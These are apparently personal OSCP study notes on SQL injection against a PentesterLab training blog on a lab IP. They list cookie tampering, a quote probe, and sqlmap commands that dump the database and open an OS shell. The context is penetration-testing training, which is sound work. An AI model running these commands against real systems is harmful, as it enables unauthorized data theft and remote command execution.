SQL Injection[SQLi]

 

Refrence: SQL Injection Authentication Bypass Cheat Sheet

https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/

 

1. Browse the PentesterLab vulnerable blog website through Firefox.

OSCP Learning Notes - WebApp Exploitation(3)_Kali Linux

 

 2.Edit the Cookie value using the tool Cookie Manager, and save it.OSCP Learning Notes - WebApp Exploitation(3)_firefox_02

3. The Click the 'Admin' button, then we can enter the administration page.

OSCP Learning Notes - WebApp Exploitation(3)_php_03

4. Watch the URL type, and we guess the DBMS may be Mysql.

OSCP Learning Notes - WebApp Exploitation(3)_Kali Linux_04

5. Change the id number to " ' ", and press enter. The page shows as the following.

OSCP Learning Notes - WebApp Exploitation(3)_Kali Linux_05

 

 6.  Use sqlmap for injection operations

sqlmap -u "http://10.0.0.21/admin/edit.php?id=1" --cookie=PHPSESSID=q5sm3kj7suae5uam1gmbh47kr1

OSCP Learning Notes - WebApp Exploitation(3)_OSCP_06

OSCP Learning Notes - WebApp Exploitation(3)_Kali Linux_07

OSCP Learning Notes - WebApp Exploitation(3)_Kali Linux_08

sqlmap -u "http://10.0.0.21/admin/edit.php?id=1" --cookie=PHPSESSID=q5sm3kj7suae5uam1gmbh47kr1 -dump

OSCP Learning Notes - WebApp Exploitation(3)_Kali Linux_09

OSCP Learning Notes - WebApp Exploitation(3)_firefox_10

OSCP Learning Notes - WebApp Exploitation(3)_firefox_11

sqlmap -u "http://10.0.0.21/admin/edit.php?id=1" --cookie=PHPSESSID=q5sm3kj7suae5uam1gmbh47kr1 --os-shell

OSCP Learning Notes - WebApp Exploitation(3)_php_12

OSCP Learning Notes - WebApp Exploitation(3)_sql_13

OSCP Learning Notes - WebApp Exploitation(3)_sql_14

 

相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。